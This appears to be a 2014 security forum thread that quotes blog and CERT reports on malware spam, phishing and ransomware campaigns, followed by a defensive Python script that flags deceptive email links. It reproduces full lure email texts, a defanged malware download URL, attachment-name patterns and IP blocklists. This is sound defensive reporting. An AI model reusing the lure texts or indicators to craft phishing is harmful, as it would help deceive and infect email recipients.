* https://www.virustotal.com/en/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414081814/

:fear: :mad:

AplusWebMaster
2014-10-24, 14:34
FYI...

Fake Invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/invoice-8014042-october-word-doc-malware/
24 Oct 2014 - "'invoice 8014042 October' pretending to come from Sandra Lynch with a malformed word doc attachment containing a macro virus is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8014042 Account No 5608014042.
Thanks very much
Kind Regards
Sandra Lynch

24 October 2014: invoice_8014042.doc : Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/9659be0ec03fafcea7200032cdf3434ba14c99b9a8e0c3a16f5419d3817c48de/analysis/1414141144/
___

Fake Fax SPAM.. again.
- http://blog.dynamoo.com/2014/10/youve-received-new-fax-spam-again.html
24 Oct 2014 - "Another day, another -fake- fax spam.
From: Fax [fax@ victimdomain .com]
To: luke.sanson@ victimdomain .com
Date: 24 October 2014 10:54
Subject: You've received a new fax
New fax at SCAN2383840 from EPSON by https://victimdomain.com
Scan date: Fri, 24 Oct 2014 15:24:22 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(eFax Drive is a file hosting service operated by J2, Inc.)

The link in the email goes to a script which (if the browser settings are correct) downloads a file document_92714-872_pdf.zip which in turn contains a malicious executable document_92714-872_pdf.exe which has a VirusTotal detection rate of 3/54*... The malware also drops two executables on the system, kcotk.exe (VT 0/53**...) and ptoma.exe (VT 2/51***...)... Recommended blocklist:
188.165.214.6
rodgersmith .com "
* https://www.virustotal.com/en/file/d9f637e2750f01b7d07451b4262a5d560ef2b5743db0a26881c4ebbd9e04373f/analysis/1414145184/

** https://www.virustotal.com/en-gb/file/8483369c80851bb2ecbf221b9d4c01dbd2980b7d3eb3c5829eccad62bef80651/analysis/1414145764/

*** https://www.virustotal.com/en-gb/file/b4798bbf747180a96b476af6adf167bd62e5c8b5d92b0c994e8a42a45c3bd19e/analysis/1414145784/
___

Widespread malvertising - delivered ransomware
- http://net-security.org/malware_news.php?id=2894
24.10.2014 - "A newer version of the Cryptowall ransomware has been delivered to unsuspecting Internet users via malicious ads shown on a considerable number of high-profile websites, including properties in the Yahoo, Match.com, and AOL domains. According to Proofpoint's calculations*, the malvertising campaign started in late September, picked up the pace this month, and lasted until October 18 and likely even a bit longer... In this campaign, the attackers used already existing ads for legitimate products, and submitted them to at least three major ad network members (Rubicon Project, Right Media/Yahoo Advertising, and OpenX). Visitors to the sites that ended up serving the malicious ads were automatically infected with the ransomware if they used software with vulnerabilities exploitable by the FlashPack Exploit Kit. The ransomware then encrypts the victims' hard drives and asks for money in return for the decryption key. Unfortunately, even if the ransom is paid, there is no guarantee that the victim will actually receive the key. The ransom is supposed to be paid in Bitcoin, and the addresses the criminals used for this purpose are C&C server-generated and many... This particular campaign now seems to be over - all the affected parties (optimizers and ad networks) have been notified, and the malicious ads pulled. Still, that doesn't mean that the attackers have not switched to spreading CryptoWall 2.0 via other means..."
* http://www.proofpoint.com/threatinsight/posts/malware-in-ad-networks-infects-visitors-and-jeopardizes-brands.php
___

Ebola-themed emails deliver malware, exploit Sandworm vulnerability (MS14-060)
- http://net-security.org/malware_news.php?id=2895
24.10.2014 - "US CERT has recently issued a warning* about malware-delivery campaigns using users' fear of the Ebola virus and its spreading as a bait. One of the most prolific campaigns is the one that -impersonates- the World Health Organization:
> http://www.net-security.org/images/articles/who-spam-24102014.jpg
The emails in question initially -linked- to the -malware-, a variant of the DarkKomet RAT tool, used by attackers to access and control the victim's computer remotely and steal information. After a while, the attackers began to attach the malware directly to the message, as access to the malicious file hosted on a popular cloud data storage service was blocked quickly by service administrators, noted Tatyana Shcherbakova:
> https://securelist.com/blog/spam-test/67344/a-false-choice-the-ebola-virus-or-malware/
According to Websense researchers**, Ebola-themed malicious emails and documents are also being used by attackers taking advantage of the recently discovered Sandworm vulnerability (CVE-2014-4114***)..."
* https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014
** http://community.websense.com/blogs/securitylabs/archive/2014/10/23/Ebola-Spreads-_2D00_-In-Cyber-Attacks-Too.aspx
*** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114 - 9.3 (HIGH)
___

Phalling for the phish...
- http://blog.dynamoo.com/2014/10/do-people-really-fall-for-this.html
24 Oct 2014 - "... a simple phishing spam..
From: info@ kythea .gr
Date: 24 October 2014 13:50
Subject: payment
this mail is to inform you that the payment have been made
see the attached file for the payment slip
ANTON ARMAS

Attached is a file payment Slip (2).html which displays a popup alert:
You have been signed out of this account this may have happened automatically cause the attachement needs authentication. to continue using this account, you will need to sign in again. this is done to protect your account and to ensure the privacy of your information

The victim then gets sent to a phishing page, in this case at uere.bplaced .net/blasted/tozaiboeki.webmail .html which looks like this..
> https://4.bp.blogspot.com/-dliSNtwDjPk/VEpWNYc6hyI/AAAAAAAAF48/S74-pPcyPuI/s1600/multiphish.jpg
... do people really fall for this? The frightening answer is.. probably, yes."

bplaced .net: 5.9.107.19: https://www.virustotal.com/en/ip-address/5.9.107.19/information/

:mad: :fear:

AplusWebMaster
2014-10-25, 14:24
FYI...

Fake 'New order' SPAM - malware
- http://myonlinesecurity.co.uk/daniela-lederer-re-new-order-malware/
25 Oct 2014 - "'Daniela Lederer Re: New Order' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Daniela-Lederer-new-order.png

25 October 2014: J2134457863.zip: Extracts to: J2134457863.exe
Current Virus total detections: 14/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/e5b881143bd10304d8211fc4f2708839361cab6af59934d327150bcb0d098e86/analysis/1414216443/

:fear: :mad:

AplusWebMaster
2014-10-27, 13:45
FYI...

Fake KLM e-Ticket SPAM – PDF malware
- http://myonlinesecurity.co.uk/klm-e-ticket-fake-pdf-malware/
27 Oct 2014 - "'KLM e-Ticket' pretending to come from e-service @klm .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/klm_air_ticket.png

27 October 2014: e-Ticket_klm_Itinerary _pdf.zip: Extracts to: e-Ticket_klm_Itinerary _pdf.exe
Current Virus total detections: 2/53* . This 'KLM e-Ticket' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0a28086129c3e01e37868532f79cd72acb21d88443fb0a377b3b8a3c184ad88/analysis/1414404573/
___

Fake 'invoice xxxxxx October' SPAM - malicious Word doc
- http://blog.dynamoo.com/2014/10/randomly-generated-invoice-xxxxxx.html
27 Oct 2014 - "There have been a lot of these today:
From: Sandra Lynch
Date: 27 October 2014 12:29
Subject: invoice 0544422 October
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 0544422 Account No 5600544422.
Thanks very much
Kind Regards
Sandra Lynch

The numbers in the email are randomly generated, as is the filename of the attachment (in this example it was invoice_0544422.doc). The document itself is malicious and has a VirusTotal detection rate of 5/53*. Inside the Word document is a macro that attempts to download and execute a malicious binary from http ://centrumvooryoga .nl/docs/bin.exe which is currently 404ing which is a good sign. There's a fair chance that the spammers will use this format again, so always be cautious of unsolicited email attachments."
* https://www.virustotal.com/en/file/7dcc2db732fc3c3c8bfbee2539644c8fbc19648d6b82c2fd35bc3a513cd059e6/analysis/1414436717/

83.96.174.219: https://www.virustotal.com/en/ip-address/83.96.174.219/information/
___

Phish... linked with “Dyre” Banking Malware
- https://www.us-cert.gov/ncas/alerts/TA14-300A
Oct 27, 2014 - "Systems Affected: Microsoft Windows. Overview:
Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payloads... Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware... The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors... Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in -unpatched- versions of Adobe Reader... After successful exploitation, a user's system will download Dyre banking malware..."
___

FTC gets courts to shut down tech support scammers
- http://www.theinquirer.net/inquirer/news/2377916/us-ftc-gets-courts-to-shut-down-tech-support-scammers
Oct 27 2014 - "... the company, which called itself PairSys, would call people at home and claim to be from Microsoft or Facebook. This is a common scam, and the caller will often claim that the victim has a PC-based problem. In some cases people fall for this. It is estimated that PairSys made $2.5m from the scam and that it employed online adverts as well as phone calls as lures. "The defendants behind Pairsys targeted seniors and other vulnerable populations, preying on their lack of computer knowledge to sell ‘security' software and programs that had no value at all," said Jessica Rich, director of the FTC's Bureau of Consumer Protection... The defendants in the case, Pairsys, Uttam Saha and Tiya Bhattacharya, have agreed to the terms of a preliminary injunction, which includes an instruction to shut down their websites and telephone lines and not to sell on their customer data lists."
* http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam

> http://www.consumer.ftc.gov/blog

:fear: :mad:

AplusWebMaster
2014-10-28, 17:16
FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
28 Oct 2014 - "An email saying 'Please find attached INVOICE number 224244 from Power EC Ltd' pretending to come from soo.sutton[random number]@ powercentre .com with a subject of 'INVOICE [random number] from Power EC Ltd' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please find attached INVOICE number 224244 from Power EC Ltd

28 October 2014 : INVOICE263795.doc - Current Virus total detections: 3/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... macro malware**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414506485/

** http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/

- http://blog.dynamoo.com/2014/10/invoice-101760-from-power-ec-ltd-spam.html
28 Oct 2014
> https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414519923/
Recommended blocklist:
62.75.184.70: https://www.virustotal.com/en/ip-address/62.75.184.70/information/
116.48.157.176: https://www.virustotal.com/en/ip-address/116.48.157.176/information/
___

Fake 'Ebola Alert Tool' ...
- https://blog.malwarebytes.org/online-security/2014/10/new-online-ebola-alert-tool-is-anything-but/
Oct 27, 2014 - "... More news of infection outside Africa such as this could further fuel the ever-increasing fear and anxiety for one’s own life and well-being, especially in terms of how one interacts with the outside world. People are trying to be more careful in their dealings than usual, always wanting to be on the know about the latest happenings. This is why web threats banking on perennial hot topics like Ebola could be effective lures against users, especially in the long run... Upon initial visit to the page, users are presented with the following prompt at the top-middle part of the screen:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ebola-with-prompts-1024x341.jpg
Below is a screenshot of the downloaded file with an overview of its details:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/ebolafile.png
EbolaEarlyWarningSystem.exe has a low detection rate as of this writing—four vendors detect it out of 53*... Upon execution, it displays a user interface prompting users to install the ONLY Search toolbar with links to its EULA and Privacy Policy pages. Once users click the “Agree” button, they are again presented with other offers to download, such as a program called Block-n-Surf (a supposed tool used to protect children from adult-related content, System Optimizer Pro (a tool that purportedly optimizes the user’s system), oneSOFTperday (a tool that gives users access to free apps), and a remote access tool among others:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/install5.png?w=564
Once programs are installed, the following have been observed from affected systems: All browser default search pages are changed to ONLY Search:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/onlysearch.png
Once users open a new browser tab, affiliate sites are loaded up (e.g. a site offering insurance):
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/insurance-affiliate.png
Browser windows open to prompt user to install more programs:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/pckeeper.png
System Optimizer Pro executes:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/sysoppro-autoexec.png?w=555
- Affected machine slows down
- Shortcut files are created on the desktop
During testing, we haven’t seen any installation of the Ebola Early Warning System toolbar or evidence of warning alerts. We implore users not to be easily swayed with software solutions banking on the Ebola scare. They may be more about enticing internet users into downloading programs that may potentially do harm on their systems, instead of helping them be aware of the current situation**..."
* https://www.virustotal.com/en/file/4c7647ff605a9880f875010b5a09e7f1435b002ad4635dff6c4d14f218eb7dd7/analysis/1414142257/

** http://www.cdc.gov/vhf/ebola/

:mad: :fear:

AplusWebMaster
2014-10-29, 14:24
FYI...

Fake 'Order confirmation' from Amazon SPAM - trojan
- http://blog.mxlab.eu/2014/10/28/fake-order-confirmation-order-details-from-amazon-contains-trojan/
Oct 28, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Order Details”. This email is sent from the spoofed address “Amazon .co.uk ” and has the following body:

Good evening,
Thank you for your order. We'll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon .co.uk.
Order Details
Order R:131216 Placed on October 09, 2014
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon...

The 532 kB malicious file is not present in a ZIP file but attached directly and has the name order_report_72364872364872364872364872368.exe (numbers may vary). The trojan is known as Trojan.MSIL.BVXGen, BehavesLike.Win32.Dropper.qh or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/17de4b7fab716f6c87b5d3c941ecb5f5b01d5e4980cff71c88451acc90b22bb0/analysis/1414490630/

- http://myonlinesecurity.co.uk/amazon-com-alert-order-details-malware/
29 Oct 2014
- https://www.virustotal.com/en/file/6fb9d2d2de05751a90e70a2973a51a1cf38939075c6849b650b5f00b07183532/analysis/1414584579/
___

Phish - spoofed Google Drive
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-improve-scheme-with-spoofed-google-drive-site/
Oct 29, 2014 - "Cybercriminals and attackers are leveraging the Google Drive site and brand to go under the radar and avoid detection. Just last week, a targeted attack* used Google Drive as a means of getting information from its victims. This time, phishers are using a modified version of the legitimate Google Drive login page to steal email credentials. This attack can be considered an improved version of attacks seen earlier this year, which asked for multiple email addresses**.
Fake Google Drive Site: Users may receive an email that contains links that lead to the spoofed Google Drive site.
Spammed message containing links to fake site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive1.jpg
The phishing site allows users to log in using different email services, which is highly unusual as Google Drive only uses Google credentials. The site also has a language option that does not work.
Fake Google Drive site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive2.jpg
To trick the user into thinking nothing suspicious is afoot, the phishing site -redirects- the user to a .PDF file from a -legitimate- site about investments. However, this redirection to a site about investments may still raise suspicions as nothing in the email indicates the specific content of the “document” is related to finances.
After logging in, users are redirected to a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive3.jpg
... Mobile Users, Also Affected: Based on our investigation, this attack will also work on mobile devices. When users clicked the “Sign in” button, the PDF file download is prompted and the users’ credentials are sent out to the cybercriminals.
Screenshot of PDF prompt download in mobile devices:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/google_drive_fig8.jpg
... Users should exercise caution when opening emails, even those from known contacts. Avoid clicking links that are embedded in emails. Users can also check first by hovering their mouse over the link; doing so can reveal the true URL of the link in the status bar. Users can also check the legitimacy of the site before sharing any personal data, be it login credentials or contact details. They can check if the site address has any discrepancy (misspellings, different domain names) from the original site (e.g., <sitename .com> versus <sitename .org>). They should also check the security of the site before sharing any information... We have notified Google about this phishing page."

* http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attacks-stealing-information-through-google-drive/

** http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-cast-wider-net-now-asking-for-multiple-emails/
___

Fake ticketmaster SPAM – PDF malware
- http://myonlinesecurity.co.uk/ticketmaster-tickets-sent-fake-pdf-malware/
29 Oct 2014 - "'ticketmaster tickets have been sent' pretending to come from confirmation-noreply@ ticketmaster .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Thank you for choosing Ticketmaster.
This email is to confirm ticket(s) have been purchased and attached:
Your Delivery Option is: printed
Your Transaction number is: 869064,00410 ...

29 October 2014: tikets224069_order_type_print_order_details.pdf.zip:
Extracts to: tikets109873_order_type_print_order_details.pdf.exe
Current Virus total detections: 7/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/203daa7fed582e06c8fd7bb770e1f8104c625261e0a03e44ab8ab7296bd4ffac/analysis/1414593309/
___

'Virtual Assistant' - PUP download site
- https://blog.malwarebytes.org/online-security/2014/10/pup-download-site-makes-use-of-virtual-assistant/
Oct 29, 2014 - "... suddenly there’s a person talking at you from the bottom right hand corner of the screen about how you should buy product X or make use of service Y? We recently saw a page asking visitors to upgrade their media player, which Malwarebytes Anti-Malware detects as PUP.Optional.SaferInstall (VirusTotal 12/53*). It looks a lot like many similar download sites out there [1], [2], with one curious addition standing over on the right hand side:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual1.jpg
A virtual assistant! She isn’t very interactive, instead launching into a recorded voiceover after a minute or so of the visitor doing nothing on the webpage. She says:
Please upgrade your media player for faster hd playback.
It only takes a minute on broadband and theres no restart required
Just click this button and follow the easy steps onscreen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual2.jpg
... I haven’t seen a virtual assistant / automated online assistant / video spokesperson / video web presenter / whatever they’re called this week used to promote a PUP (Potentially Unwanted Program) download before... Who knows what.. advertising will offer up next..."
* https://www.virustotal.com/en/file/cf192f2c0c433b10ef963f199ae759264749c72a100d4b5907d555ec748cf519/analysis/1414085568/
... Behavioural information
TCP connections
66.77.96.162: https://www.virustotal.com/en/ip-address/66.77.96.162/information/
87.248.208.11: https://www.virustotal.com/en/ip-address/87.248.208.11/information/
90.84.55.33: https://www.virustotal.com/en/ip-address/90.84.55.33/information/
63.245.201.112: https://www.virustotal.com/en/ip-address/63.245.201.112/information/

1] http://blog.malwarebytes.org/wp-content/uploads/2014/01/asosvouchers5.jpg

2] http://blog.malwarebytes.org/wp-content/uploads/2013/12/obamapads4.jpg
___

Hackers use Gmail Drafts to update their Malware and Steal Data
- http://www.wired.com/2014/10/hackers-using-gmail-drafts-update-malware-steal-data/
10.29.14 - "... Researchers at the security startup Shape Security say they’ve found a strain of malware on a client’s network that uses that new, furtive form of “command and control” — the communications channel that connects hackers to their malicious software — allowing them to send the programs updates and instructions and retrieve stolen data. Because the commands are hidden in unassuming Gmail drafts that are never even sent, the hidden communications channel is particularly difficult to detect. “What we’re seeing here is command and control that’s using a fully allowed service, and that makes it superstealthy and very hard to identify,” says Wade Williamson, a security researcher at Shape. “It’s stealthily passing messages back and forth without even having to press send. You never see the bullet fired.” Here’s how the attack worked in the case Shape observed: The hacker first set up an anonymous Gmail account, then infected a computer on the target’s network with malware. (Shape declined to name the victim of the attack.) After gaining control of the target machine, the hacker opened their anonymous Gmail account on the victim’s computer in an invisible instance of Internet Explorer — IE allows itself to be run by Windows programs so that they can seamlessly query web pages for information, so the user has no idea a web page is even open on the computer. With the Gmail drafts folder open and hidden, the malware is programmed to use a Python script to retrieve commands and code that the hacker enters into that draft field. The malware responds with its own acknowledgments in Gmail draft form, along with the target data it’s programmed to exfiltrate from the victim’s network. All the communication is encoded to prevent it being spotted by intrusion detection or data-leak prevention. The use of a reputable web service instead of the usual IRC or HTTP protocols that hackers typically use to command their malware also helps keep the hack hidden. 
Williamson says the new infection is in fact a variant of a remote access trojan (RAT) called Icoscript first found by the German security firm G-Data* in August. At the time, G-Data said that Icoscript had been infecting machines since 2012, and that its use of Yahoo Mail emails to obscure its command and control had helped to keep it from being discovered. The switch to Gmail drafts, says Williamson, could make the malware stealthier still..."
* https://www.virusbtn.com/virusbulletin/archive/2014/08/vb201408-IcoScript
___

Dangers of opening suspicious emails: Crowti ransomware
- http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx
28 Oct 2014 - "... MMPC has seen a spike in number of detections for threats in the Win32/Crowti ransomware this month as the result of new malware campaigns. Crowti is a family of ransomware that when encountered will attempt to encrypt the files on your PC, and then ask for payment to unlock them. These threats are being distributed through spam email campaigns and exploits. Crowti impacts -both- enterprise and home users, however, this type of threat can be particularly damaging in enterprise environments. In most cases, ransomware such as Crowti can encrypt files and leave them inaccessible. That’s why it’s important to back up files on a regular basis... We also recommend you increase awareness about the dangers of opening suspicious emails – this includes not opening email attachments or links from untrusted sources. Attackers will usually try to imitate regular business transaction emails such as fax, voice mails, or receipts. If you receive an email that you’re not expecting, it’s best to ignore it. Try to validate the source of the email first -before- clicking on a link or opening the attachment... The graph below shows how Crowti ransomware has impacted our customers during the past month.
Daily encounter data for Win32/Crowti ransomware:
> http://www.microsoft.com/security/portal/blog-images/a/crowti1.png
Computers in the United States have been most affected with 71 percent of total infections, followed by Canada, France and Australia.
Telemetry data for Win32/Crowti by country, 21 September – 21 October 2014:
> http://www.microsoft.com/security/portal/blog-images/a/crowti2.png
Crowti is being distributed via spam campaigns with email attachments designed to entice the receiver to open them. We have seen the following attachment names:
VOICE<random numbers>.scr
IncomingFax<random numbers>.exe
fax<random numbers>.scr/exe
fax-id<random numbers>.exe/scr
info_<random numbers>.pdf.exe
document-<random numbers>.scr/exe
Complaint_IRS_id-<random numbers>.scr/exe
Invoice<random numbers>.scr/exe
The attachment is usually contained within a zip archive. Opening and running this file will launch the malware... Our telemetry and research shows that Win32/Crowti is also distributed via exploits kits such as Nuclear, RIG, and RedKit V2. These kits can deliver different exploits, including those that exploit Java and Flash vulnerabilities... Crowti's primary payload is to encrypt the files on your PC. It usually brands itself with the name CryptoDefense or CryptoWall... we saw a Crowti sample distributed with a valid digital certificate which was issued to Trend... This is not associated with Trend Micro and the certificate has since been revoked. Crowti has used digital certificates to bypass detection systems before - we have previously seen it using a certificate issued to The Nielsen Company... There are a number of security precautions that can help prevent these attacks in both enterprise and consumer machines. As well as being aware of suspicious emails and backing up your files, you should also keep your security products and other applications up-to-date. Attackers are taking advantage of unpatched vulnerabilities in software to compromise your machine. Most of the exploits used by Crowti target vulnerabilities found in browser plugin applications such as Java and Flash. Making a -habit- of regularly updating your software can help reduce the risk of infection... we also recommend running a real-time security product..."

:fear::fear: :mad:
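The Trend Micro write-up above tells users to hover over a link to reveal its true URL and to compare the domain with the real one (sitename .com versus sitename .org). The following is an added example, not code from the quoted post or from this forum, that does those two comparisons over an HTML mail body: it flags anchors whose visible text shows one host while the href points at another, and targets that contain a brand word but sit under some other domain. The sample body, the example.net/example.org hosts and the brand list are constructed for the demo.

```python
"""Check an HTML e-mail for links whose visible text disagrees with the target.

Added example, not code from the Trend Micro post: it automates the "hover
over the link and compare" advice. Two checks: (1) anchor text that shows
one host while href points at another, and (2) a target host that contains
a brand word (assumed list) but is not under that brand's domain, the
sitename.com versus sitename.org case. The sample body and the hostnames
(example.net, example.org) are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(value):
    """Lowercase host from a URL or bare domain ('' if none), 'www.' stripped."""
    if "://" not in value:
        value = "http://" + value
    host = (urlparse(value).hostname or "").lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def under_domain(host, domain):
    """True if host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def looks_like_host(text):
    """Heuristic: anchor text such as 'google.com/support' names a host."""
    return "." in text and " " not in text and "@" not in text


def audit_links(html, brand_domains):
    """Return suspicious links as dicts with href, text and reasons."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        target = host_of(href)
        reasons = []
        if looks_like_host(text):
            shown = host_of(text)
            if shown and shown != target:
                reasons.append(f"text shows {shown} but link goes to {target or '(no host)'}")
        for domain in brand_domains:
            brand = domain.split(".")[0]
            # Lookalike: the brand word appears in the host but the host is
            # not under the brand's real domain (google-drive.example.org).
            if brand in target and not under_domain(target, domain):
                reasons.append(f"host {target} mentions {brand} but is not under {domain}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample in the style of the fake Google Drive invitation above.
SAMPLE_EMAIL = """
<p>Accept the shared document by clicking the link below:</p>
<p><a href="http://secure-login.example.net/gdrive/index.html">https://drive.google.com/file/d/3623019-73</a></p>
<p>Questions? See <a href="https://www.google.com/support/">google.com/support</a>.</p>
<p>Or <a href="http://google-drive.example.org/signin">sign in here</a>.</p>
"""

if __name__ == "__main__":
    for finding in audit_links(SAMPLE_EMAIL, ["google.com"]):
        print(finding["href"], "->", "; ".join(finding["reasons"]))
```

Only the first and third links are reported: the support link resolves to the same host it displays and sits under google.com. The brand check is deliberately a substring match, so it will also flag unrelated hosts that happen to contain the word; treat its output as a triage hint, not a verdict.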

AplusWebMaster
2014-10-30, 12:05
FYI...

Fake Securitas SPAM – PDF malware
- http://myonlinesecurity.co.uk/securitas-mail-report-attached-fake-pdf-malware/
30 Oct 2014 - "'From Securitas Mail Out Report Attached' pretending to come from Alert ARC Reports is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk.com

30 October 2014: Q100982010_Mail Out Report.zip: Extracts to: Q100771292_Mail Out Report.exe
Current Virus total detections: 1/54* . This 'From Securitas Mail Out Report Attached' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/835a6a272b252576247a6f51bd1fc6e4ac972284435759baa8fd4f926c25bd97/analysis/1414659759/
___

Fake 'Accounts Payable' SPAM - malware .doc attachment
- http://myonlinesecurity.co.uk/reminder-word-doc-malware/
30 Oct 2014 - "An email with a Microsoft word doc attachment saying 'Please see attached statement sent to us' pretending to come from random names with a subject of 'Further Reminder' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The name of the alleged sender matches the name of the 'Senior Accounts Payable Clerk from the Finance Department' in the body of the email... word macro malware*... The email looks like:
Good afternoon,
Please see attached statement sent to us, I have highlighted on this the payments made to you in full and attached a breakdown of each one for you to correctly allocate. Hope this helps.
Thanking you in advance.
Many Thanks & Kind Regards
Vivian Dennis
Senior Accounts Payable Clerk
Finance Department ..

30 October 2014 : CopyHA779333.doc - Current Virus total detections: 0/53**. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/

** https://www.virustotal.com/en/file/949d05c3e51abcee43c74c5309a61b18ffa1cf17cb0be06bdab1a4e52cadb8f5/analysis/1414671500/

- http://blog.dynamoo.com/2014/10/further-reminder-spam-has-malicious.html
30 Oct 2014
... Recommended blocklist:
212.59.117.207: https://www.virustotal.com/en/ip-address/212.59.117.207/information/
217.160.228.222: https://www.virustotal.com/en/ip-address/217.160.228.222/information/
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
81.7.3.101: https://www.virustotal.com/en/ip-address/81.7.3.101/information/
195.154.126.245: https://www.virustotal.com/en/ip-address/195.154.126.245/information/
___

Fake Job offer SPAM - malware
- http://myonlinesecurity.co.uk/job-service-new-offer-job-malware/
30 Oct 2014 - "'Job service New offer Job' pretending to come from Job service is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/new-offer-job.png

30 October 2014: job.pdf.zip: Extracts to: job.pdf.exe
Current Virus total detections: 3/53*. same malware as today’s version of my new photo malware**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
